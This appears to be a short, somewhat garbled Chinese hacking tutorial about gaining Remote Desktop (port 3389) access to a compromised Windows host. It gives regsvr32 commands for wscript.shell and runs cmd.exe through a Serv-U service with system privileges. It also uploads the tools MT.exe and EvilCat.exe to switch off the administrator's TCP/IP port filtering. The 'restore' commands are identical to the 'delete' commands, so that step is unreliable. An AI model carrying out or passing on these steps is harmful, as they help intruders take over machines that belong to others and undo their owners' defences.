wscript.shell × 命令行实行组件 这是由于wscript.shell改名了,或者从注册表删除了 删除方法: regsvr32/u C:\windows\System32\wshom.ocx regsvr32/u C:\windows\System32\shell32.dll 规复方法: regsvr32/u C:\windows\System32\wshom.ocx regsvr32/u C:\windows\System32\shell32.dll 这里利用serv-u实行规复命令 cmd /c regsvr32/u C:\windows\System32\wshom.ocx cmd /c regsvr32/u C:\windows\System32\shell32.dll 规复wscript.shell之后,本来不能读取的3389端口,变为可以读取了 为什么有时候3389开放却不能连接,有时候是由于防火墙,把终端端口转发到其他端口就可以连接, 但是更多的转发后依然是连接不上,哪是由于管理员在TCP/IP里设置的端口限定。 就算再怎么转都是连不上的。 我们须要把端口转为TCP/IP里设置的只许可连接的端口个中一个就可以了, 更好的办法是取消端口限定。 我们上传一个MT到肉鸡上,然后用具备系统权限的sev-u来实行命令。 上传cmd.exe,MT.exe到C盘, 就在Serv-u实行:c:\cmd.exe /c "mt -filter off" 而且运行成功,肉鸡也不会重启。 也可以传一个“解除TCPIP筛选的小工具EvilCat.exe”(有个小小缺陷,运行后主机会重启) 直接运行就可以了 传到c:\EvilCat.exe 在Serv-u实行就OK了:c:\cmd.exe /c "EvilCat.exe"
